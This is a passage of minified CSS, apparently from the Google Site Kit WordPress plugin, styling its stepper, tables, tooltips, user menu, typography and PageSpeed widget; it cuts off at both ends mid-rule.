600px){.googlesitekit-plugin .googlesitekit-stepper__step{display:flex}}.googlesitekit-plugin .googlesitekit-stepper__step-progress{display:flex;flex-direction:column}.googlesitekit-plugin .googlesitekit-stepper__step-number{align-items:center;background-color:#161b18;border-radius:12px;color:#fff;display:flex;font-size:12px;height:24px;justify-content:center;width:24px}.googlesitekit-plugin .googlesitekit-stepper__step-progress-line{background-color:#cbd0d3;display:none;flex:1;height:100%;margin:5px auto;min-height:30px;width:1px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-stepper__step-progress-line{display:block}}.googlesitekit-plugin .googlesitekit-stepper__step-title{align-items:center;color:#161b18;display:flex;height:24px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-stepper__step-title{margin:0}}.googlesitekit-plugin .googlesitekit-stepper__step-content-container{display:grid;grid-template-rows:0fr;transition:grid-template-rows .2s ease-in-out;visibility:hidden}.googlesitekit-plugin .googlesitekit-stepper__step-content{overflow:hidden}.googlesitekit-plugin .googlesitekit-stepper__step--upcoming .googlesitekit-stepper__step-number{background-color:#6c726e}.googlesitekit-plugin .googlesitekit-stepper__step--upcoming .googlesitekit-stepper__step-title{color:#6c726e}.googlesitekit-plugin .googlesitekit-stepper__step--active .googlesitekit-stepper__step-content-container{grid-template-rows:1fr;margin-bottom:24px;visibility:visible}.googlesitekit-plugin .googlesitekit-stepper__step--completed .googlesitekit-stepper__step-number{color:#fff}.googlesitekit-plugin .googlesitekit-stepper__step--completed .googlesitekit-stepper__step-number svg{height:10px;width:10px}.googlesitekit-plugin .googlesitekit-stepper__step:last-child .googlesitekit-stepper__step-content-container{margin-bottom:0}.googlesitekit-plugin .googlesitekit-tab-bar__settings{margin:0 -16px;width:calc(100% + (16px * 2))}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-tab-bar__settings{margin:0;width:100%}}.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-tab-scroller__scroll-content{gap:1px}.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-tab{background-color:#fff;color:#161b18;font-size:14px;font-weight:500;letter-spacing:.25px;line-height:1}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-tab:first-child{border-radius:16px 0 0 16px;overflow:hidden}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-tab:last-child{border-radius:0 16px 16px 0;overflow:hidden}}.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-ripple-upgraded--background-focused::after{background-color:#fff}.googlesitekit-plugin .googlesitekit-tab-bar__settings .mdc-tab__text-label{color:#161b18;opacity:1}.googlesitekit-plugin .googlesitekit-tab-bar--start-aligned-high-contrast{border-bottom:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-tab-bar--start-aligned-high-contrast .mdc-tab-scroller__scroll-content .mdc-tab{flex:none;height:56px}.googlesitekit-plugin .googlesitekit-tab-bar--start-aligned-high-contrast .mdc-tab-scroller__scroll-content .mdc-tab .mdc-tab__content{color:#161b18;font-size:12px;font-weight:500;letter-spacing:-0.1px;line-height:1.33;padding-top:2px}.googlesitekit-plugin .googlesitekit-tab-bar--start-aligned-high-contrast .mdc-tab-scroller__scroll-content .mdc-tab.mdc-tab--active .mdc-tab__content{color:#3c7251}.googlesitekit-plugin .googlesitekit-tab-bar--start-aligned-high-contrast .mdc-tab-indicator>.mdc-tab-indicator__content--underline{height:3px}.googlesitekit-table{counter-reset:table;font-size:14px;letter-spacing:.25px;padding:16px;position:relative}@media(min-width: 960px){.googlesitekit-table{padding:24px}}.googlesitekit-alltraffic-widget .googlesitekit-table,.googlesitekit-wp-dashboard .googlesitekit-table{padding:0}.googlesitekit-table .googlesitekit-table__wrapper{border-collapse:collapse;table-layout:fixed;width:100%}.googlesitekit-table .googlesitekit-table__wrapper--tabbed-layout{table-layout:auto}.googlesitekit-table .googlesitekit-table__head-row{border-bottom:1px solid #ebeef0}.googlesitekit-table .googlesitekit-table__head-item{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:700;hyphens:auto;line-height:1.25;outline:0;padding:0 4px 8px 4px;position:relative;text-align:right;-webkit-text-decoration:none;text-decoration:none;white-space:normal}@media(min-width: 600px){.googlesitekit-table .googlesitekit-table__head-item{padding:0 8px 8px 8px}}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__head-item{padding:0 12px 12px 12px}}.googlesitekit-table .googlesitekit-table__head-item:first-child{padding-left:0;text-align:left}.googlesitekit-table .googlesitekit-table__head-item:last-child{padding-right:0}.googlesitekit-widget--with-header .googlesitekit-table .googlesitekit-table__head-item{font-size:14px;line-height:1.14}.googlesitekit-table-overflow .googlesitekit-table .googlesitekit-table__head-item:last-child{padding-right:0}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__head-item[data-tooltip]::before{background:rgba(0,0,0,.7);border-radius:3px;color:#fff;content:attr(data-tooltip);display:none;font-size:12px;letter-spacing:.2px;max-width:250px;opacity:0;padding:calc(16px / 2) 24px;pointer-events:none;position:absolute;right:0;text-align:center;top:100%;transition:opacity .2s ease-in-out,visibility .2s ease-in-out;visibility:hidden}}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__head-item:first-child[data-tooltip]::before{left:0}}.googlesitekit-table .googlesitekit-table__head-item--primary{width:50%}.googlesitekit-table .googlesitekit-table__wrapper--2-col .googlesitekit-table__head-item--primary{width:75%}.googlesitekit-table .googlesitekit-table__body{color:#161b18;font-weight:400}.googlesitekit-table .googlesitekit-table__body-row{border-bottom:1px solid #ebeef0}.googlesitekit-table .googlesitekit-table__body-row--no-data td{white-space:normal}.googlesitekit-table .googlesitekit-table__body-item{padding:8px 4px;text-align:right}@media(min-width: 600px){.googlesitekit-table .googlesitekit-table__body-item{padding:8px}}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__body-item{padding:12px}}.googlesitekit-table .googlesitekit-table__body-item:first-child{padding-left:0;text-align:left}.googlesitekit-table .googlesitekit-table__body-item:last-child{padding-right:0}.googlesitekit-table .googlesitekit-table__body-item .googlesitekit-mini-chart{display:none}@media(min-width: 600px){.googlesitekit-table .googlesitekit-table__body-item .googlesitekit-mini-chart{display:block}}.googlesitekit-table-overflow .googlesitekit-table .googlesitekit-table__body-item:last-child{padding-right:0}@media(max-width: 600px){.googlesitekit-table .googlesitekit-table__body-item-content .googlesitekit-cta-link,.googlesitekit-table .googlesitekit-table__body-item-content>span{display:block;overflow:hidden;text-overflow:ellipsis}}.googlesitekit-wp-dashboard .googlesitekit-table .googlesitekit-table__body-item-link{background-image:none}.googlesitekit-table .googlesitekit-table__body-item-url{background-image:none;display:block;font-size:12px;letter-spacing:.2px;word-break:break-word}.googlesitekit-table .googlesitekit-table__body-item-chart-wrap{align-items:center;display:flex;justify-content:flex-end}.googlesitekit-table .googlesitekit-table__source{margin-top:16px}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__source{margin-top:24px}}.googlesitekit-table--with-list .googlesitekit-table__body-row{transition:background-color .2s ease-in-out}.googlesitekit-table--with-list .googlesitekit-table__body-row:last-child{border-bottom:0}.googlesitekit-table--with-list .googlesitekit-table__body-row:hover{background-color:rgba(22,27,24,.08)}.googlesitekit-table--with-list .googlesitekit-table__body-row--no-data:hover{background-color:transparent}.googlesitekit-table--with-list .googlesitekit-table__body-item:first-child .googlesitekit-table__body-item-content{margin-left:24px;position:relative}.googlesitekit-table--with-list .googlesitekit-table__body-item:first-child .googlesitekit-table__body-item-content::before{content:counter(table) ".";counter-increment:table;left:-24px;position:absolute}.googlesitekit-table--gathering-data{padding-bottom:0}.googlesitekit-table-overflow{position:relative}@media(max-width: 600px){.googlesitekit-table-overflow::after{background:linear-gradient(to right, rgba(255, 255, 255, 0) 0%, white 85%, white 100%);bottom:0;content:"";display:block;pointer-events:none;position:absolute;right:0;top:0;transition:all .2s ease-in-out;width:0}}.googlesitekit-table-overflow .googlesitekit-table-overflow__container{overflow-x:auto;white-space:nowrap}@media(min-width: 600px){.googlesitekit-table-overflow .googlesitekit-table-overflow__container{overflow-x:visible;white-space:normal}}@media(max-width: 600px){.googlesitekit-table-overflow--gradient::after{width:15%}}.googlesitekit-plugin .googlesitekit-text-field-icon--warning,.googlesitekit-plugin .googlesitekit-text-field-icon--error{align-items:center;border-radius:50%;display:flex;height:22px;justify-content:center;width:22px}.googlesitekit-plugin .googlesitekit-text-field-icon--warning svg,.googlesitekit-plugin .googlesitekit-text-field-icon--error svg{color:#fff;margin-bottom:3px}.googlesitekit-plugin .googlesitekit-text-field-icon--warning{background-color:#895a00}.googlesitekit-plugin .googlesitekit-text-field-icon--error{background-color:#ac4220}.googlesitekit-tooltip-popper.MuiTooltip-popper{z-index:99999}.googlesitekit-tooltip.MuiTooltip-tooltip{background-color:#161b18;border-radius:32px;color:#ebeef0;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;padding:14.5px 19px}.googlesitekit-tooltip .MuiTooltip-arrow{color:#161b18}.googlesitekit--has-visible-tooltip #adminmenuwrap{z-index:10}.googlesitekit-plugin .googlesitekit-analytics-usesnippet p,.googlesitekit-plugin .googlesitekit-tagmanager-usesnippet p{font-size:12px;letter-spacing:.2px}.googlesitekit-plugin .googlesitekit-header .googlesitekit-user-selector{margin-right:-4px}@media(max-width: 783px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-user-selector .mdc-button__label{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}}@media(max-width: 783px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-user-selector .mdc-button__icon{margin-right:0}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-user-selector button{padding:4px}.googlesitekit-plugin .googlesitekit-user-menu{background-color:#f3f5f7;border-radius:24px;max-width:335px;width:calc(100vw - 32px)}.googlesitekit-plugin .googlesitekit-user-menu .mdc-list{padding-bottom:0}.googlesitekit-plugin .googlesitekit-user-menu li{margin:0;padding:0 8px}.googlesitekit-plugin .googlesitekit-user-menu .mdc-list-item,.googlesitekit-plugin .googlesitekit-user-menu .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-user-menu .googlesitekit-view-only-menu__list-item{padding:0 7.16% 0 14.33%}.googlesitekit-plugin .googlesitekit-user-menu .mdc-list-item:hover,.googlesitekit-plugin .googlesitekit-user-menu .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item:hover,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-user-menu .googlesitekit-view-only-menu__list-item:hover{background-color:unset;color:rgba(0,0,0,.87)}.googlesitekit-plugin .googlesitekit-user-menu .mdc-list-item:hover::before,.googlesitekit-plugin .googlesitekit-user-menu .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item:hover::before,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-user-menu .googlesitekit-view-only-menu__list-item:hover::before{background-color:rgba(22,27,24,.08);opacity:1;transition:none}.googlesitekit-plugin .googlesitekit-user-menu__item{align-items:center;column-gap:30px;display:flex;width:100%}.googlesitekit-plugin .googlesitekit-user-menu__item-icon{display:flex}.googlesitekit-plugin .googlesitekit-user-menu__item-label{color:#161b18;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.googlesitekit-plugin .googlesitekit-user-menu__details{align-items:center;background-color:#fff;border-radius:24px;column-gap:14px;display:flex;padding:16px;width:100%}.googlesitekit-plugin .googlesitekit-user-menu__details-avatar{border:1px solid rgba(32,33,36,.13);border-radius:50%;height:64px;width:64px}.googlesitekit-plugin .googlesitekit-user-menu__details-info{overflow:hidden}.googlesitekit-plugin .googlesitekit-user-menu__details-info p{margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.googlesitekit-plugin .googlesitekit-user-menu__details-info__name{color:#161b18;font-weight:500;line-height:1.43}.googlesitekit-plugin .googlesitekit-user-menu__details-info__email{color:#6c726e;font-size:12px;line-height:1.33}.googlesitekit-plugin .googlesitekit-view-only-menu h4{font-size:16px;letter-spacing:.5px;margin:15px 0}.googlesitekit-plugin .googlesitekit-view-only-menu p{color:#161b18;font-size:14px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-button--dropdown .mdc-button__icon{margin-right:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-button--dropdown .mdc-button__icon{height:16px;margin-right:8px;width:16px}}.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-button--dropdown .mdc-button__icon--image{height:inherit;width:inherit}.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-menu{width:320px}.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list-divider{margin:8px 32px 4px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item{display:block;height:auto;padding:0 32px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item:last-child{margin-bottom:5px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__description p{margin-bottom:8px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__description .mdc-button{margin:6px 0 9px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__service{display:flex;gap:8px;margin-bottom:10px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__service svg{padding:2px;width:24px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__service--icon{flex:0 0 24px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting{padding:0;transition:background-color .3s}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting:hover{background-color:rgba(22,27,24,.08)}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item{display:flex;gap:8px;margin-bottom:0}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item .mdc-button{color:#161b18;justify-content:flex-start;padding:0 32px;width:100%}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item .mdc-button:hover{background:transparent}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item .mdc-button::after,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item .mdc-button::before{background-color:transparent}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item .mdc-button.mdc-ripple-upgraded--background-focused{background-color:transparent}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item svg{padding:2px;width:24px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item--icon{align-items:center;display:flex;flex:0 0 24px;justify-content:center;margin-right:7px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__email-reporting-item--name{font-size:14px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__service--name{font-size:14px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__service--owner{color:#161b18;flex:1;font-size:12px;letter-spacing:.2px;margin-left:auto;overflow:hidden;text-overflow:ellipsis}.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__service--standard-item{margin-top:15px}.googlesitekit-plugin .googlesitekit-view-only-menu--user-can-authenticate .googlesitekit-view-only-menu__service--name{flex:0 0 100px;margin-right:8px}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--display{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--display.googlesitekit-typography--small{font-size:38px;font-weight:400;letter-spacing:0;line-height:1.158}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--display.googlesitekit-typography--medium{font-size:46px;font-weight:400;letter-spacing:0;line-height:1.13}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--display.googlesitekit-typography--large{font-size:58px;font-weight:400;letter-spacing:-0.25px;line-height:1.1}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--headline{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--headline.googlesitekit-typography--small{font-size:22px;font-weight:400;letter-spacing:0;line-height:1.27}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--headline.googlesitekit-typography--medium{font-size:28px;font-weight:400;letter-spacing:0;line-height:1.286}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--headline.googlesitekit-typography--large{font-size:32px;font-weight:400;letter-spacing:0;line-height:1.25}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--title{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--title.googlesitekit-typography--small{font-size:14px;font-weight:500;letter-spacing:-0.1px;line-height:1.14}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--title.googlesitekit-typography--medium{font-size:16px;font-weight:500;letter-spacing:0.1px;line-height:1.25}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--title.googlesitekit-typography--large{font-size:18px;font-weight:500;letter-spacing:0;line-height:1.33}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--body{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--body.googlesitekit-typography--small{font-size:12px;font-weight:400;letter-spacing:0.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--body.googlesitekit-typography--medium{font-size:14px;font-weight:400;letter-spacing:0.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--body.googlesitekit-typography--large{font-size:16px;font-weight:400;letter-spacing:0.5px;line-height:1.5}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--label{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--label.googlesitekit-typography--small{font-size:12px;font-weight:500;letter-spacing:0.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--label.googlesitekit-typography--medium{font-size:14px;font-weight:500;letter-spacing:0;line-height:1.43}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-typography--label.googlesitekit-typography--large{font-size:16px;font-weight:500;letter-spacing:0;line-height:1.5}.googlesitekit-plugin .googlesitekit-typography--body+.googlesitekit-typography--body{margin-top:0}.googlesitekit-signin-box{background-color:#fff;border-color:#b8bdb9;display:block;margin:20px auto;padding:20px;text-align:center}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__chart-zero-data{align-items:center;display:flex;justify-content:center;min-height:368px}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__chart-zero-data>svg{color:#cbd0d3;height:300px;width:300px}.googlesitekit-plugin .googlesitekit-adsense-site-stats .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-analytics-site-stats .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-search-console-site-stats .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .google-visualization-tooltip{border-color:#b8bdb9;border-radius:8px;box-shadow:none;height:auto !important;width:auto !important;z-index:8}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip{padding:0 1em}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip em{font-style:normal;font-weight:700}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip strong{color:#000;margin:0 .25em 0 1em}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip p{font-size:14px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip svg{margin-right:.25em}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip--up em{color:#46732b}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip--down em{color:#ac4220}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip-others em{display:none}.googlesitekit-dashboard-module-header{margin:0 0 -5px}@media(min-width: 960px){.googlesitekit-dashboard-module-header{margin-bottom:-10px}}.googlesitekit-dashboard-module-header .googlesitekit-dashboard-module-header__title{color:#5f6561;margin:0}.googlesitekit-dashboard-module-header .googlesitekit-dashboard-module-header__description{font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-dashboard-module-header .googlesitekit-dashboard-module-header__time{font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-entity-dashboard .googlesitekit-entity-dashboard__heading{margin:10px 0 0}@media(min-width: 961px){.googlesitekit-entity-dashboard .googlesitekit-entity-dashboard__entity-header{margin-top:var(--mdc-layout-grid-gutter-desktop, 24px)}}@media(min-width: 601px)and (max-width: 960px){.googlesitekit-entity-dashboard .googlesitekit-entity-dashboard__entity-header{margin-top:var(--mdc-layout-grid-gutter-tablet, 16px)}}@media(max-width: 600px){.googlesitekit-entity-dashboard .googlesitekit-entity-dashboard__entity-header{margin-top:var(--mdc-layout-grid-gutter-phone, 16px)}}.googlesitekit-entity-dashboard .googlesitekit-entity-dashboard__title{margin:0 0 10px}.googlesitekit-plugin .googlesitekit-lean-cta-banner{display:flex;flex-direction:column}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-lean-cta-banner{align-items:center;flex:1;flex-direction:row;padding-inline:36px}}.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body{display:flex;flex-direction:column;padding-block:20px;padding-inline:16px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body{align-items:center;flex-direction:row;padding-inline:24px}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body{flex:0 1 auto;margin-right:24px;padding:0}}.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body .googlesitekit-lean-cta-banner__body-icon{display:flex;margin-bottom:6px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body .googlesitekit-lean-cta-banner__body-icon{justify-content:right;margin-bottom:0}}.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body .googlesitekit-lean-cta-banner__body-content p{margin:0 0 4px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body .googlesitekit-lean-cta-banner__body-content{margin-left:20px}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__body .googlesitekit-lean-cta-banner__body-content{margin-left:24px}}.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__graphic{display:flex;justify-content:center;padding-inline:24px}.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__graphic svg{max-height:128px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__graphic{padding-inline:0}.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__graphic svg{height:150px;max-height:unset}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-lean-cta-banner .googlesitekit-lean-cta-banner__graphic{flex:1 1 auto}}.googlesitekit-pagespeed-widget .googlesitekit-cta-link{white-space:nowrap}.googlesitekit-pagespeed-widget .googlesitekit-table{border-spacing:0;padding:0;width:100%}.googlesitekit-pagespeed-widget .googlesitekit-table thead{display:none}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__content-wrapper{position:relative}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__header{align-items:flex-end;border-bottom:1px solid #ebeef0;border-radius:16px 16px 0 0;display:flex;justify-content:space-between}@media(max-width: 599px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__header{align-items:center;flex-direction:column-reverse;justify-content:flex-end}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__data-src-tabs button.mdc-tab{margin:0 10px;text-transform:none}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__data-src-tabs button.mdc-tab .mdc-tab-indicator__content--underline{border-top-left-radius:3px;border-top-right-radius:3px;height:3px}@media(max-width: 449px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__data-src-tabs button.mdc-tab{margin:0 6px;padding:0 6px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__device-size-tab-bar-wrapper{padding:12px;width:auto}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics--field-data-unavailable{align-items:center;display:flex;height:auto;justify-content:center;padding:16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics--field-data-unavailable{min-height:285px;padding:24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics__field-data-unavailable-content{display:flex;flex-direction:column;justify-content:flex-start;max-width:600px;width:75%}@media(max-width: 599px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics__field-data-unavailable-content{width:100%}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics__field-data-unavailable-content h3{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:18px;line-height:1.33;margin:0 0 .25rem}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics__field-data-unavailable-content p{font-size:14px;letter-spacing:.25px;line-height:1.43;margin:.25rem 0}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-insights-web-vitals-metrics__field-data-unavailable-content a{margin:0}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__footer{border-top:1px solid 